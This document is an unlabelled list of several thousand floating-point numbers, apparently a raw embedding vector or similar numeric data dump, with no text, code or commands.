-0.016557956114411354, 0.016187366098165512, 0.00861250888556242, -0.04930327832698822, 0.012184996157884598, 0.013445001095533371, -0.016498662531375885, 0.020678916946053505, 0.007856505922973156, -0.014986655674874783, -0.007708269637078047, -0.014541947282850742, -0.025274230167269707, -0.020560327917337418, 0.014089827425777912, 0.02007114887237549, 0.09000886976718903, 0.03021048754453659, -0.014037945307791233, -0.012733468785881996, -0.02466646395623684, -0.020664092153310776, 0.02241327613592148, -0.002023420762270689, 0.021953744813799858, -0.015038537792861462, 0.022131629288196564, -0.00040463783079758286, 0.0028257479425519705, -0.016839604824781418, -0.013771120458841324, -0.017091605812311172, 0.012622292153537273, -0.006659500300884247, 0.004261783789843321, 0.007007854990661144, -0.012889116071164608, 0.023599164560437202, 0.03904535248875618, -0.011080637574195862, -0.003372367937117815, -0.013963826932013035, -0.0004083437379449606, -0.005951673723757267, 0.001988214673474431, -0.008212272077798843, -0.013674766756594181, 0.003687369404360652, -0.011925582773983479, 0.012822410091757774, 0.012659350410103798, 0.002973983995616436, 0.016053954139351845, -0.007233914919197559, 0.02093091793358326, -0.0205010324716568, 0.0026015411131083965, -0.017032312229275703, 0.021627625450491905, -0.0073969741351902485, -0.0010496958857402205, -0.03382744640111923, 0.027290239930152893, 0.004765786230564117, -0.014334416948258877, -0.03344203159213066, -0.021034682169556618, -0.017877256497740746, 0.013230059295892715, 0.03293802961707115, -0.010413575917482376, -0.01712125353515148, -0.004458196461200714, 0.0032648970372974873, 0.0200266782194376, -0.02603023499250412, 0.02654905989766121, 0.00910909939557314, 0.02183515578508377, 0.015157126821577549, -0.00580714363604784, 0.01371923740953207, -0.016024306416511536, 0.019241027534008026, 0.010398752056062222, 0.025689290836453438, -0.00019826559582725167, -0.006240733899176121, 0.008190036751329899, -0.012133113108575344, -0.0016954487655311823, 0.03382744640111923, -0.016587603837251663, 0.0011256667785346508, -0.029410013929009438, -0.030388372018933296, 0.009049804881215096, 0.02740882895886898, 0.0018353464547544718, 0.008782980032265186, -0.003931958694010973, 0.008004741743206978, 0.01088793110102415, 0.0002236278378404677, 0.005247552879154682, -0.018855614587664604, -0.012429584749042988, 0.0035965749993920326, 0.017565960064530373, 0.0035409864503890276, -0.026356352493166924, -0.003392750397324562, 0.007107913959771395, -0.014808772131800652, -0.009776161052286625, 0.0038059582002460957, 0.009235099889338017, 0.0070226783864200115, 0.0217758622020483, 0.022502217441797256, 0.007248738314956427, 0.029009776189923286, 0.0021420095581561327, 0.008360507898032665, 0.020323149859905243, -0.004977022297680378, -0.025466937571763992, 0.0048843747936189175, 0.013571001589298248, -0.021597979590296745, -0.004899198189377785, -0.01678031124174595, -0.001908537931740284, -0.005103022791445255, 0.008864509873092175, -0.021761039271950722, -0.01958196982741356, -0.017017487436532974, 0.027616359293460846, -0.03252296894788742, 0.013734061270952225, -0.014504888094961643, -0.008619921281933784, -0.02924695424735546, 0.02927660197019577, 0.02514081820845604, 0.02319892682135105, 0.013874885626137257, -0.004261783789843321, -0.011725463904440403, 0.03940111771225929, -0.03062554821372032, -0.012822410091757774, 0.004584196954965591, 0.031841084361076355, -0.010094868950545788, -0.011688405647873878, 0.029484132304787636, -0.004158018622547388, 0.03575451299548149, 0.02423657849431038, 0.0006536279106512666, -0.004313666373491287, 0.022887632250785828, 0.013081823475658894, 0.005380965303629637, -0.004550843965262175, 0.00128131452947855, 0.00015889041242189705, 0.021938921883702278, 0.02230951189994812, 0.010309810750186443, 0.022961750626564026, -0.009368512779474258, -0.010339458473026752, 0.010280163958668709, -0.001074710744433105, 0.03919358551502228, 0.03109990432858467, -0.004291431047022343, -0.006503852549940348, 0.00616661598905921, -0.010954637080430984, -0.040764886885881424, -0.010309810750186443, -0.021538684144616127, -0.008219683542847633, 0.004847315605729818, -0.010317222215235233, -0.0016157719073817134, 0.003227838082239032, 0.006133262533694506, -0.015431363135576248, -0.008879333734512329, -0.010910166427493095, 0.011110285297036171, -0.008264154195785522, 0.019152086228132248, -0.027127180248498917, -0.00707826716825366, 0.02509634755551815, -0.021168094128370285, 0.0007856505690142512, 0.002358804689720273, -0.017551137134432793, 0.005103022791445255, -0.000477134482935071, 0.022057510912418365, -0.021182918921113014, -0.02840200997889042, -0.017743844538927078, -0.012362878769636154, 0.014527123421430588, 0.01712125353515148, -0.013593236915767193, -0.011362286284565926, 0.011332638561725616, 0.007419209461659193, -0.0029869545251131058, -0.016973016783595085, 0.013659943826496601, -0.015535128302872181, 0.020160090178251266, -0.013104058802127838, -0.032819442451000214, -0.019329968839883804, -0.004269195720553398, 0.013800767250359058, 0.01577230542898178, 0.02697894349694252, 0.021227389574050903, -0.0034057211596518755, 0.030477313324809074, -0.012726057320833206, 0.009805808775126934, 0.026415647938847542, -0.015268303453922272, -0.006151792127639055, -0.007185738068073988, 0.009472277946770191, -0.018811142072081566, -0.027097532525658607, 0.04319595918059349, -0.012651938945055008, -0.006844795309007168, 0.004891786724328995, 0.020723387598991394, 0.021257035434246063, 0.03439074382185936, -0.009212864562869072, -0.004087606444954872, -0.0002418099029455334, -0.006296322215348482, -0.007671210914850235, 0.01120663806796074, -0.028446480631828308, -0.0021660979837179184, 0.023969754576683044, -0.015446186996996403, -0.004591608885675669, -0.013007705099880695, -0.0002485268341843039, 0.0035743394400924444, 0.03068484365940094, 0.00014939405082259327, 0.02474058046936989, -0.008790392428636551, 0.0041394890286028385, 0.011117696762084961, 0.0023513927590101957, 0.0019863618072122335, 0.03130743280053139, 0.01042839977890253, 0.0021271859295666218, 0.04239548370242119, -0.024562697857618332, 0.021123623475432396, -0.005103022791445255, -0.01274829264730215, -0.005095610860735178, 0.001366550219245255, 0.013734061270952225, -0.007241326384246349, -0.0067150890827178955, -0.023006221279501915, 0.039341822266578674, -0.0034928098320961, -0.006755853537470102, -0.006548323202878237, -0.013200411573052406, -0.023925283923745155, 0.019922912120819092, -0.01722501777112484, -0.03495403751730919, -0.02005632594227791, 0.007745328824967146, -0.004450784530490637, 0.03021048754453659, -0.016869252547621727, -0.015727834776043892, -0.015965012833476067, 0.012466643936932087, -0.009657572954893112, -0.00583308469504118, 0.006915207486599684, -0.011228873394429684, 0.003943076357245445, 0.023154456168413162, -0.023925283923745155, -0.0186036117374897, 0.019670911133289337, 0.016469014808535576, -0.03963829576969147, 0.03765193372964859, -0.00744515098631382, -0.02423657849431038, 0.014319593086838722, -0.00376889924518764, 0.022027863189578056, 0.016513485461473465, -0.004676844459027052, 0.0157574824988842, -0.002399569610133767, -0.019893266260623932, 0.012133113108575344, -0.0030647784005850554, 0.02373257651925087, -0.018722200766205788, -0.016587603837251663, -0.018781496211886406, 0.023095162585377693, 0.022205745801329613, -0.005770084448158741, 0.023821517825126648, 0.00930180586874485, -0.017017487436532974, 0.02603023499250412, 0.009309218265116215, 0.0001193994321511127, -0.05760449171066284, -0.0039541940204799175, -0.012429584749042988, 0.0029461896046996117, 0.011021343059837818, 0.008775568567216396, -0.006574264727532864, 0.019878441467881203, 0.015594422817230225, 0.009242512285709381, 0.007056031376123428, 0.005536613054573536, -0.019389262422919273, 0.0021864804439246655, 0.001858508330769837, 0.00834568403661251, -0.016898898407816887, -0.007760152220726013, 0.02365845814347267, -0.011592051945626736, -0.023154456168413162, 0.026578707620501518, 0.010443223640322685, 0.018959378823637962, 0.0043989019468426704, -0.005080787464976311, -0.010458046570420265, -0.014875478111207485, -0.013267118483781815, -0.012162759900093079, 0.009828044101595879, 0.0008542097057215869, 0.010146751068532467, 0.003622516291216016, -0.008501332253217697, -0.024977758526802063, -0.02236880548298359, -0.014245475642383099, 0.008086271584033966, -0.0031314846128225327, -0.01228876132518053, -0.03160390630364418, 0.010257928632199764, -0.014082415960729122, -0.014119475148618221, -0.008397567085921764, -0.011636522598564625, -0.017506666481494904, -0.013348648324608803, -0.019922912120819092, 0.013222647830843925, -0.0048843747936189175, 0.017862433567643166, 0.023584341630339622, 0.013793355785310268, -0.01818855106830597, 0.022991396486759186, 0.009939220733940601, 0.009272159077227116, 0.00744515098631382, 0.005684848874807358, -0.033738505095243454, -0.002933219075202942, -0.00626667495816946, 0.010495105758309364, -0.016187366098165512, -0.008026977069675922, 0.04325525090098381, -0.0081159183755517, -0.008286390453577042, 0.02843165583908558, -0.007107913959771395, -0.002123480197042227, 0.015713011845946312, 0.005870143882930279, -0.010028162971138954, 0.015668541193008423, -0.0076934462413191795, 0.005425435956567526, -0.026371177285909653, 0.010495105758309364, 0.0036039866972714663, -0.016113247722387314, -0.008538391441106796, -0.03480580449104309, 0.0073969741351902485, 0.001628742553293705, 0.02182033285498619, 0.005506965797394514, 0.02137562446296215, -0.019893266260623932, -0.002783130155876279, -0.004317372106015682, -0.0015944630140438676, 0.01065075397491455, 0.015327597968280315, 0.010072633624076843, -0.009857690893113613, 0.0040764887817204, -0.017906904220581055, -0.01772901974618435, 0.012659350410103798, 0.00932404212653637, 0.010057809762656689, -0.0296916626393795, 0.008286390453577042, 0.030418017879128456, -0.0102134570479393, 0.023791871964931488, 0.016869252547621727, 0.029632367193698883, -0.019344791769981384, -0.010087456554174423, 0.0015777865191921592, 0.00649644061923027, 0.012036759406328201, -0.03169284760951996, 0.0007624886929988861, -0.012414761818945408, -0.008412390947341919, 0.0024366285651922226, 0.014408535324037075, 0.0051252581179142, -0.005544024985283613, 0.008716274052858353, -0.008797803893685341, 0.0034316624514758587, 0.024933287873864174, -0.006996737327426672, -0.03293802961707115, 0.006481617223471403, 0.0018195963930338621, -0.0008815407054498792, 0.01535724475979805, -0.01624666154384613, -0.01352653093636036, -0.0003856451075989753, 0.01815890520811081, -0.01584642380475998, 0.01900384947657585, 0.0007189444149844348, 0.018455376848578453, 0.015727834776043892, 0.00008894157508620992, -0.023006221279501915, 0.0004315056139603257, -0.02835753932595253, 0.0236732829362154, -0.0042136069387197495, 0.0055625541135668755, -0.009242512285709381, -0.004350725561380386, 0.004447078797966242, -0.011918171308934689, -0.009131334722042084, -0.005432847887277603, 0.00910909939557314, 0.013037352822721004, 0.021271860226988792, -0.01999703049659729, -0.01815890520811081, -0.007252444047480822, 0.0428994856774807, 0.003931958694010973, 0.02610435150563717, -0.0027775713242590427, 0.003757781581953168, -0.012474055401980877, -0.0006661353399977088, -0.014267710968852043, -0.0037911345716565847, -0.0024996288120746613, -0.0031351905781775713, -0.001669507473707199, 0.01811443455517292, 0.018233023583889008, 0.013882297091186047, -0.009664984419941902, 0.013215235434472561, 0.013630296103656292, -0.010065221227705479, 0.004054253455251455, -0.01725466549396515, -0.023584341630339622, 0.008049212396144867, 0.0236732829362154, -0.01251852698624134, 0.025852350518107414, -0.010821225121617317, 0.011288167908787727, 0.0217758622020483, 0.013296765275299549, -0.017313959077000618, 0.0021660979837179184, 0.012659350410103798, -0.01993773691356182, 0.012963234446942806, 0.002938777906820178, 0.009034981951117516, 0.014638300985097885, -0.016632074490189552, 0.008049212396144867, 0.0027905418537557125, -0.021212564781308174, 0.011895935982465744, -0.013274529948830605, -0.013155940920114517, 0.0059294383972883224, 0.009501924738287926, -0.006770677398890257, -0.021093977615237236, 0.0010265340097248554, 0.0033353089820593596, 0.006955972407013178, -0.012948410585522652, 0.02241327613592148, -0.014312181621789932, 0.019833970814943314, -0.015253479592502117, 0.0015879777492955327, 0.006433440372347832, 0.0008148345514200628, -0.009546395391225815, 0.028046242892742157, -0.03267120569944382, -0.00592573219910264, 0.0026608353946357965, -0.01993773691356182, -0.009412983432412148, -0.0030573667027056217, 0.007500739302486181, -0.004380372352898121, 0.008249331265687943, 0.008086271584033966, 0.0010858284076675773, -0.006426028907299042, 0.015475833788514137, -0.012726057320833206, -0.0029221014119684696, 0.012496291659772396, 0.01023569330573082, -0.008864509873092175, 0.010324634611606598, 0.006059144623577595, 0.013511707074940205, -0.009472277946770191, -0.025363171473145485, 0.0054402598179876804, -0.014942184090614319, -0.010917577892541885, -0.0005206788191571832, 0.00956863071769476, 0.010591459460556507, -0.013571001589298248, 0.004313666373491287, 0.018410906195640564, 0.015683364123106003, 0.011325227096676826, 0.00453602010384202, -0.024458933621644974, 0.005666319280862808, 0.016187366098165512, -0.014230651780962944, 0.015950189903378487, -0.011295580305159092, -0.014275122433900833, -0.01577230542898178, -0.00765638705343008, -0.001619477872736752, 0.0006536279106512666, 0.002788688987493515, -0.025244584307074547, 0.01046545896679163, -0.021553508937358856, 0.00532908271998167, -0.004358137026429176, -0.0017510371981188655, 0.01440112292766571, 0.0034557506442070007, -0.011970053426921368, 0.002273568883538246, -0.020767858251929283, 0.021064329892396927, 0.027186473831534386, 0.0065372055396437645, -0.030358724296092987, -0.01903349719941616, 0.02276904322206974, -0.027557063847780228, 0.007126443553715944, 0.0024366285651922226, 0.004221018869429827, 0.01764007844030857, 0.021479390561580658, 0.001089534256607294, -0.005032610613852739, -0.020723387598991394, 0.002584864618256688, 0.01512006763368845, -0.004591608885675669, 0.0120738185942173, 0.010220869444310665, 0.010569224134087563, 0.016617251560091972, -0.006355616729706526, -0.009412983432412148, -0.012436997145414352, 0.007226502988487482, 0.03447968512773514, 0.02272457256913185, -0.0033705150708556175, 0.024518227204680443, 0.03729616850614548, 0.005284612067043781, 0.021182918921113014, -0.00833827257156372, 0.0015231245197355747, 0.018825966864824295, -0.029528602957725525, 0.022531865164637566, 0.00933886505663395, -0.012696409597992897, -0.006125851068645716, -0.0023699223529547453, -0.011584640480577946, 0.018914908170700073, -0.0009931809036061168, 0.03886746987700462, 0.015490657649934292, 0.01276311557739973, 0.012407349422574043, 0.0024866582825779915, -0.03311591222882271, -0.016646897420287132, -0.04432255029678345, 0.016528308391571045, 0.0021660979837179184, 0.0060480269603431225, 0.004943669307976961, 0.01959679275751114, 0.004684256389737129, 0.01279276330024004, 0.013496884144842625, 0.010873107239603996, -0.011065814644098282, 0.014719830825924873, 0.02054550312459469, -0.003626222023740411, 0.029573073610663414, 0.019745029509067535, 0.00376889924518764, -0.011955229565501213, -0.0011932994239032269, -0.013096646405756474, -0.010287575423717499, -0.030418017879128456, -0.00014823595120105892, 0.01531277410686016, 0.0019752441439777613, -0.004354431293904781, 0.003457603743299842, -0.027171650901436806, -0.006225910037755966, 0.0006628926494158804, -0.02140527218580246, 0.014230651780962944, -0.009020158089697361, 0.005521789193153381, -0.013126294128596783, 0.003103690454736352, 0.0035965749993920326, -0.014408535324037075, -0.01142899226397276, -0.006426028907299042, 0.004017194267362356, -0.001139563973993063, 0.008367919363081455, 0.002288392512127757, -0.018929731100797653, -0.0036058395635336637, -0.008530979044735432, -0.01906314492225647, 0.021019859239459038, 0.0035261628217995167, -0.0021716568153351545, -0.005306847393512726, -0.000773143139667809, 0.01420100498944521, -0.007723093498498201, 0.006670617964118719, -0.0051808468997478485, 0.009702043607831001, -0.00834568403661251, -0.005870143882930279, -0.004806550685316324, -0.004706491716206074, 0.006633559241890907, -0.0021716568153351545, 0.005647790152579546, 0.002158686053007841, -0.023584341630339622, -0.004128371365368366, -0.008679214864969254, -0.005914614535868168, -0.023880813270807266, 0.006211086641997099, 0.013911944814026356, 0.03335309028625488, -0.00021934289543423802, 0.03575451299548149, -0.006844795309007168, -0.00002583995956229046, -0.005940556060522795, -0.00004913211159873754, -0.014423358254134655, -0.0028313067741692066, 0.006444558035582304, 0.014838418923318386, 0.0031166609842330217, -0.0035798982717096806, -0.008953452110290527, -0.012177583761513233, -0.011117696762084961, -0.00018239971541333944, 0.011932994239032269, -0.008390155620872974, 0.02189445123076439, -0.005877555813640356, 0.004673138726502657, 0.006325969472527504, -0.001001519151031971, 0.004098724108189344, 0.012777939438819885, 0.011562404222786427, -0.006363028660416603, 0.011540168896317482, -0.0061554983258247375, 0.011236285790801048, -0.0015055214753374457, -0.0024162461049854755, -0.009872514754533768, 0.02136080153286457, 0.02745329961180687, -0.003112955018877983, -0.024295873939990997, -0.019255850464105606, 0.0005693187122233212, -0.016394896432757378, -0.00810109544545412, 0.017358429729938507, -0.013837826438248158, 0.007797211408615112, -0.025778232142329216, 0.021597979590296745, -0.015194186009466648, -0.006852207239717245, 0.013326412998139858, 0.005266082473099232, -0.016572780907154083, 0.0038244877941906452, 0.005017787218093872, 0.0009820632403716445, -0.010524752549827099, 0.013800767250359058, -0.006741030141711235, 0.020278679206967354, -0.02187962643802166, 0.006311146076768637, 0.0035706337075680494, 0.00676326546818018, -0.011799582280218601, 0.01864808425307274, -0.010539576411247253, 0.011228873394429684, 0.013622884638607502, 0.008745921775698662, 0.012251702137291431, -0.006770677398890257, 0.0021660979837179184, -0.007252444047480822, 0.011258521117269993, 0.026815883815288544, -0.005655201617628336, -0.024310696870088577, 0.017966197803616524, 0.0181292574852705, 0.009828044101595879, -0.006878148298710585, 0.02835753932595253, -0.007363621145486832, -0.004680550191551447, 0.02551140822470188, 0.016024306416511536, -0.015490657649934292, 0.007522974628955126, 0.013207823969423771, 0.0014675359707325697, 0.0016648750752210617, -0.002529276069253683, 0.030981315299868584, -0.0008240992901846766, -0.00033098310814239085, -0.001286873361095786, 0.014690183103084564, -0.005473612807691097, 0.012029347941279411, -0.0157574824988842, -0.03338273614645004, 0.007489621639251709, -0.0003101374313700944, -0.01861843653023243, -0.006581676658242941, 0.006403793580830097, 0.0006633559241890907, -0.010791577398777008, -0.010309810750186443, -0.005366141442209482, -0.0072079733945429325, -0.00025918130995705724, 0.01771419681608677, 0.012325819581747055, 0.00780462333932519, -0.009079452604055405, 0.0003518287849146873, 0.003496515564620495, 0.009049804881215096, 0.0006948560476303101, 0.015564775094389915, 0.005162317305803299, -0.0021271859295666218, 0.012681585736572742, 0.022190922871232033, 0.005629260558634996, 0.015490657649934292, -0.004113547969609499, -0.0007763858302496374, 0.002992513356730342, 0.038808174431324005, 0.01577230542898178, 0.013697002083063126, 0.004284019116312265, -0.0017825374379754066, 0.005947967991232872, -0.0121108777821064, 0.0013674766523763537, -0.003563221776857972, -0.0027646005619317293, -0.0002746997633948922, -0.00037962303031235933, 0.01089534256607294, -0.017491843551397324, -0.0016268896870315075, -0.008656979538500309, -0.0052994354628026485, -0.0011914465576410294, -0.020352797582745552, 0.0035261628217995167, 0.006433440372347832, 0.011718052439391613, -0.020575150847434998, -0.0036095455288887024, -0.01629113219678402, -0.01188852358609438, -0.01912243850529194, 0.017877256497740746, -0.008264154195785522, -0.0046212561428546906, -0.02555587887763977, 0.014364064671099186, 0.00933145359158516, 0.019922912120819092, 0.00429884297773242, 0.017432548105716705, -0.009116511791944504, -0.030951667577028275, -0.003522456856444478, 0.004977022297680378, -0.013222647830843925, -0.028150008991360664, -0.005506965797394514, 0.022087156772613525, 0.01415653433650732, -0.001121960929594934, -0.009049804881215096, -0.020841974765062332, 0.009650160558521748, 0.019804323092103004, 0.006500146817415953, 0.017743844538927078, 0.0060406154952943325, -0.0004567520518321544, 0.027171650901436806, 0.021093977615237236, -0.02972131036221981, 0.0008032536134123802, -0.02279869094491005, 0.02416246198117733, 0.018870437517762184, 0.008975687436759472, -0.006481617223471403, 0.021034682169556618, -0.013304176740348339, 0.01071004755795002, 0.010606282390654087, -0.007597093004733324, -0.0023754811845719814, -0.02273939549922943, -0.014823595993220806, 0.008545802906155586, 0.004269195720553398, 0.007482210174202919, -0.03957900032401085, 0.0061592040583491325, -0.01906314492225647, -0.02279869094491005, -0.023006221279501915, 0.007007854990661144, 0.030773784965276718, -0.023954929783940315, -0.008938628248870373, 0.013585825450718403, 0.006618735380470753, -0.004739844705909491, -0.00004102545790374279, -0.0060480269603431225, 0.02045656181871891, -0.0033853386994451284, 0.008086271584033966, -0.03613992780447006, 0.011977464891970158, -0.00816038902848959, 0.006859618704766035, -0.022887632250785828, 0.01562406960874796, 0.012607468292117119, 0.023851165547966957, 0.008316037245094776, -0.004828786477446556, -0.03622886911034584, -0.0003821708378382027, 0.035487689077854156, 0.012903939932584763, -0.003798546502366662, 0.02091609314084053, -0.009509336203336716, -0.0016528309788554907, 0.01119181513786316, 0.004691667854785919, -0.0030999844893813133, 0.022946925833821297, -0.006329675205051899, -0.0029906604904681444, 0.03302697092294693, 0.00860509742051363, -0.005221611820161343, 0.008538391441106796, -0.015535128302872181, 0.013815591111779213, -0.007597093004733324, -0.034153565764427185, -0.009776161052286625, 0.009961456060409546, -0.01088793110102415, -0.020263856276869774, -0.02463681623339653, 0.006470499560236931, -0.01020604558289051, -0.01716572418808937, -0.023021044209599495, 0.021138448268175125, 0.016898898407816887, 0.021494213491678238, -0.020738210529088974, 0.034687213599681854, -0.0019011261174455285, 0.02932107262313366, -0.022902455180883408, -0.0024977759458124638, -0.008545802906155586, -0.01632077805697918, 0.011584640480577946, 0.015920542180538177, -0.003672545775771141, -0.011525345966219902, 0.004865845199674368, -0.013637708500027657, -0.0013961974764242768, 0.005847908556461334, 0.005362435709685087, -0.018811142072081566, 0.0024106872733682394, 0.025407643988728523, -0.01160687580704689, -0.004732432775199413, 0.01909279078245163, -0.01233323197811842, 0.015179362148046494, -0.006474205292761326, 0.0038615467492491007, -0.0014239916345104575, -0.01584642380475998, -0.03774087503552437, -0.00018158904276788235, -0.004550843965262175, -0.005221611820161343, 0.006466793827712536, -0.007548916153609753, -0.0005521789425984025, -0.011599463410675526, -0.002203156938776374, 0.009872514754533768, 0.010102280415594578, -0.0019604205153882504, 0.001213681884109974, 0.018885260447859764, -0.002203156938776374, -0.010546988807618618, -0.009598278440535069, 0.007007854990661144, 0.017536314204335213, -0.0024922171141952276, -0.01557959895581007, -0.0012507408391684294, 0.007989917881786823, -0.006307439878582954, -0.006411205045878887, -0.000025535959139233455, 0.0025811586529016495, 0.007289503235369921, -0.007063443306833506, -0.008190036751329899, 0.022472571581602097, 0.0061554983258247375, 0.005043728277087212, 0.0005063184653408825, 0.0025311289355158806, 0.009086864069104195, -0.015223832800984383, -0.01574265956878662, -0.0032074556220322847, 0.009457454085350037, 0.02137562446296215, -0.0027961006853729486, -0.02880224585533142, 0.015401716344058514, -0.01907796785235405, 0.014312181621789932, 0.010672989301383495, -0.0030777491629123688, -0.00011609886860242113, -0.0065372055396437645, 0.00003399004344828427, -0.011962641961872578, 0.023095162585377693, -0.02085679955780506, 0.028728129342198372, 0.010332046076655388, 0.0020901269745081663, -0.006485322955995798, 0.016632074490189552, 0.000026317673473386094, 0.03018084168434143, -0.0025311289355158806, -0.01115475594997406, 0.004354431293904781, 0.00582567322999239, 0.01019863411784172, 0.0026293352711945772, 0.011955229565501213, 0.009190629236400127, 0.0007078266935423017, 0.013659943826496601, 0.007111620157957077, -0.001738066552206874, 0.004891786724328995, -0.012081230990588665, -0.010272751562297344, 0.0099762799218297, -0.005551436450332403, 0.014912537299096584, 0.014282534830272198, -0.0032556322403252125, 0.020738210529088974, -0.0028516892343759537, 0.010902754962444305, -0.007797211408615112, 0.004587902687489986, 0.0035150451585650444, 0.005462495144456625, 0.005751555319875479, -0.003909723367542028, 0.00765638705343008, -0.009049804881215096, 0.0006888339412398636, 0.01002075057476759, -0.0051141404546797276, -0.011132520623505116, -0.016039131209254265, -0.02327304519712925, 0.036050986498594284, -0.005981320980936289, -0.002453305060043931, 0.009872514754533768, -0.011710640974342823, 0.003122219815850258, 0.01046545896679163, -0.024755405262112617, 0.023969754576683044, -0.03290838375687599, 0.021568331867456436, 0.007430327590554953, -0.0057478491216897964, -0.011910758912563324, -0.02419210784137249, -0.011629111133515835, -0.01624666154384613, 0.0000638109486317262, -0.001069151796400547, -0.024043872952461243, -0.028135184198617935, -0.020130442455410957, 0.010302399285137653, -0.004502667114138603, 0.014497476629912853, -0.00882745161652565, 0.00910168793052435, 0.03679216280579567, -0.034212857484817505, -0.005873849615454674, 0.019789500162005424, -0.014349240809679031, 0.03430179879069328, -0.008353096432983875, 0.006959678139537573, -0.006140674464404583, 0.019389262422919273, -0.0043247840367257595, -0.021227389574050903, 0.002633041236549616, 0.008738509379327297, 0.0012776086805388331, 0.007385856471955776, -0.013963826932013035, 0.02190927416086197, -0.014052769169211388, 0.0024310697335749865, -0.000015359213648480363, 0.012348054908216, -0.011777346953749657, -0.03347167745232582, 0.02474058046936989, -0.018811142072081566, 0.019656088203191757, -0.009768749587237835, 0.0048843747936189175, -0.006970795802772045, 0.0032760147005319595, 0.006944854743778706, -0.001236843760125339, 0.013689590618014336, -0.03501333296298981, -0.007159796543419361, -0.0070967962965369225, -0.015935365110635757, -0.00008795719622867182, 0.002957307267934084, -0.013659943826496601, -0.004154312890022993, 0.0029943662229925394, 0.014860655181109905, 0.01462347712367773, 0.019819147884845734, -0.02179068513214588, -0.0027293944731354713, 0.0039467825554311275, -0.001449006493203342, -0.01120663806796074, 0.0020808621775358915, -0.020382443442940712, 0.009664984419941902, 0.004832492209970951, -0.011495698243379593, -0.0043210783042013645, -0.016958193853497505, 0.013289353810250759, 0.014512300491333008, -0.02656388282775879, 0.007782387547194958, 0.011562404222786427, -0.020619621500372887, 0.0030110429506748915, -0.01675066351890564, 0.0057478491216897964, 0.008471684530377388, 0.01680995710194111, 0.00007620254473295063, 0.015209008939564228, -0.01093981321901083, -0.015031126327812672, 0.00405054772272706, 0.009027569554746151, -0.011110285297036171, -0.003346426645293832, -0.03498368710279465, 0.007263561710715294, -0.0021772156469523907, 0.02878742292523384, 0.009042393416166306, 0.015164538286626339, 0.008078860118985176, 0.003666986944153905, 0.007241326384246349, -0.01142158079892397, 0.0005304067744873464, -0.007485915906727314, 0.016157720237970352, -0.010680400766432285, -0.005870143882930279, -0.008553214371204376, 0.017521489411592484, -0.005792320240288973, -0.009020158089697361, 0.029439661651849747, -0.007270973641425371, -0.03019566461443901, -0.00020081340335309505, -0.0035094863269478083, -0.0009496366255916655, 0.02324339747428894, 0.0033093676902353764, -0.012444408610463142, 0.004773197695612907, 0.02377704717218876, -0.000021453681256389245, 0.02746812254190445, -0.013155940920114517, -0.004302548710256815, -0.0005475465441122651, -0.0006230542785488069, 0.0013656237861141562, 0.002153127221390605, -0.013926767744123936, -0.002942483639344573, -0.0010154163464903831, 0.0010089309653267264, 0.0013257852988317609, -0.020753033459186554, 0.008745921775698662, 0.009650160558521748, 0.006755853537470102, -0.003742957953363657, 0.009249923750758171, -0.008353096432983875, 0.011221461929380894, 0.016987841576337814, -0.008056623861193657, 0.013608060777187347, -0.012325819581747055, 0.009146158583462238, 0.005733025725930929, -0.005959085654467344, 0.0036169574595987797, -0.0037559284828603268, -0.012259113602340221, -0.03204861283302307, -0.006500146817415953, 0.007115325890481472, 0.008864509873092175, 0.011058402247726917, 0.012918763794004917, -0.0008171506924554706, 0.0063482047989964485, 0.0039467825554311275, -0.021197741851210594, -0.009894750081002712, 0.010813812725245953, -0.008716274052858353, 0.009027569554746151, 0.003383485833182931, 0.013089234940707684, -0.001563889323733747, 0.017936550080776215, 0.01590571738779545, -0.0031518670730292797, 0.017951374873518944, 0.008864509873092175, 0.01900384947657585, 0.01443818211555481, 0.016083601862192154, 0.008694038726389408, 0.005796025972813368, 0.011288167908787727, -0.011947818100452423, -0.02285798452794552, 0.017061958089470863, 0.02886154130101204, -0.023865988478064537, 0.02051585726439953, -0.023035867139697075, 0.00452860863879323, -0.012540762312710285, 0.018514670431613922, -0.005443965550512075, -0.005836790893226862, -0.004532314371317625, -0.0186777301132679, -0.0023550987243652344, 0.02236880548298359, -0.011903347447514534, -0.0026515705976635218, -0.01019863411784172, 0.0030703372322022915, 0.008753333240747452, -0.008308625780045986, 0.03332344442605972, -0.0018538759322836995, -0.010828636586666107, 0.005810849368572235, 0.0036169574595987797, -0.008968275040388107, -0.0008963642758317292, -0.02603023499250412, -0.019893266260623932, 0.009049804881215096, 0.008701451122760773, 0.004595314618200064, 0.0046286676079034805, -0.028654010966420174, -0.009442630223929882, -0.002992513356730342, -0.0034594566095620394, 0.010450635105371475, -0.00020324539218563586, 0.01234064344316721, -0.02700859121978283, 0.016646897420287132, 0.00730803282931447, -0.022487394511699677, 0.03074413724243641, 0.002373628318309784, 0.011317815631628036, 0.004261783789843321, -0.011369697749614716, 0.008219683542847633, 0.010865695774555206, -0.0008227095822803676, 0.014838418923318386, 0.02142009511590004, -0.018351610749959946, 0.016557956114411354, -0.005525495391339064, -0.003513192292302847, 0.008997922763228416, -0.0015129332896322012, 0.00662614731118083, 0.017447372898459435, -0.016409721225500107, 0.014875478111207485, 0.001999332569539547, -0.006792912725359201, -0.013348648324608803, 0.014749477617442608, 0.0100133391097188, -0.006670617964118719, 0.012814998626708984, -0.010621106252074242, 0.016973016783595085, -0.0026108059100806713, -0.03821523115038872, 0.0028868953231722116, 0.00441743154078722, 0.004309960640966892, 0.006351910997182131, 0.002812777180224657, 0.023539869114756584, 0.004561961628496647, 0.011265932582318783, -0.015994660556316376, 0.01629113219678402, -0.002427363768219948, 0.009650160558521748, -0.02182033285498619, -0.011184402741491795, 0.0038652524817734957, 0.006133262533694506, -0.0006429734639823437, 0.018010668456554413, 0.004191371612250805, -0.022057510912418365, -0.007982506416738033, -0.023880813270807266, 0.0037188695278018713, 0.007834270596504211, -0.020204560831189156, -0.005240140948444605, -0.007900976575911045, -0.007248738314956427, -0.006429734639823437, -0.013430178165435791, 0.00022605984122492373, -0.008768157102167606, 0.003059219568967819, -0.004558255895972252, 0.0009616807801648974, -0.013311589136719704, 0.011769934557378292, 0.001316520618274808, 0.024770228192210197, -0.026400823146104813, 0.021938921883702278, 0.009168393909931183, -0.0036206631921231747, 0.005173434969037771, -0.03868958353996277, -0.0102505162358284, 0.004832492209970951, -0.003307514823973179, -0.00910909939557314, 0.001751963747665286, 0.008316037245094776, 0.015031126327812672, -0.02276904322206974, 0.006563147064298391, 0.014994067139923573, -0.004969610366970301, -0.025244584307074547, -0.02505187690258026, 0.009153570048511028, 0.007030090317130089, -0.02235398255288601, -0.0043284897692501545, -0.01713607646524906, 0.001599095412530005, 0.029113542288541794, 0.003935664892196655, 0.027082709595561028, -0.023391634225845337, 